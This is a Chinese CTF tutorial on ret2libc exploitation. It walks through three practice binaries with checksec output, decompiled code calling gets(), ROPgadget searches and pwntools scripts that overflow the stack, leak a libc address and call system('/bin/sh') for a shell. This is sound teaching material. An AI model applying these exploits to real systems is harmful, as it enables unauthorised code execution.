ctfwiki-pwn-ret2libc

ret2libc

原理:ret2libc即控制函数执行libc中的函数,通常返回至某个函数的plt处或者函数的具体位置(即函数对应的got表项的内容)。一般情况下,我们会选择执行system("/bin/sh"),故而此时我们需要知道system函数的地址。

ret2libc1

[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

查看程序源代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets(&s);
  return 0;
}

使用ROPgadget工具查找'/bin/sh'

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc1 --string '/bin/sh'
Strings information
============================================================
0x08048720 : /bin/sh

在查找sys函数,看是否存在

.plt:08048460 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]

exp

from pwn import *
#by diaolan
io=process("./ret2libc1")
binsh_addr = 0x08048720
plt_sys_addr = 0x08048460
pd = flat(['a'*112,plt_sys_addr,'b'*4,binsh_addr])
io.sendline(pd)
io.interactive()

ret2libc2

[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("Something surprise here, but I don't think it will work.");
  printf("What do you think ?");
  gets(&s);
  return 0;
}
pwndbg> cyclic -l caab
108
.plt:08048490 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --string '/bin/sh'
Strings information
============================================================

找不到/bin/sh

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --only 'pop|ret'
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

exp如下

from pwn import *
#by diaolan
sh=process("./ret2libc2")
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
pd = flat(['a'*112,gets_plt,pop_ebx,buf2,system_plt,'b'*4,buf2])
sh.sendline(pd)
sh.sendline('/bin/sh')
sh.interactive()

ret2libc3

root@moli-virtual-machine:~/文档/ret2libc# checksec ret2libc3
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets(&s);
  return 0;
}
pwndbg> cyclic -l caab
108
root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc3 --string '/bin/sh'
Strings information
============================================================

既没有/bin/sh,也没有sys

知识点
  • sys函数属于libc,而libc.so动态链接库中的函数之间的相对偏移是固定的
  • 即使程序开启了ASLR保护,也只是针对地址中间位进行随机,最低的12位不会发生变化
  • 如果我们知道libc某个函数的地址,那么我们就可以确定该程序利用的libc,进而我们就可以知道sys函数的地址
  • 由于got表的延迟绑定机制,我们需要泄露已经执行过的函数的地址
  • 在得到libc后,libc中也有binsh,我们可以直接得到binsh的地址

操作步骤

  • 泄露_libc_start_main地址
  • 获取libc版本
  • 获取sys地址与/bin/sh地址
  • 再次执行源程序
  • 触发system('/bin/sh')

exp如下

from pwn import *
from LibcSearcher import *
#by diaolan
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']

payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])

sh.sendlineafter('Can you find it !?', payload)
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])

sh.sendline(payload)

sh.interactive()
上一篇:BIT 常态化在线CTF系统 pwn题目


下一篇:glibc __libc_free() 源码分析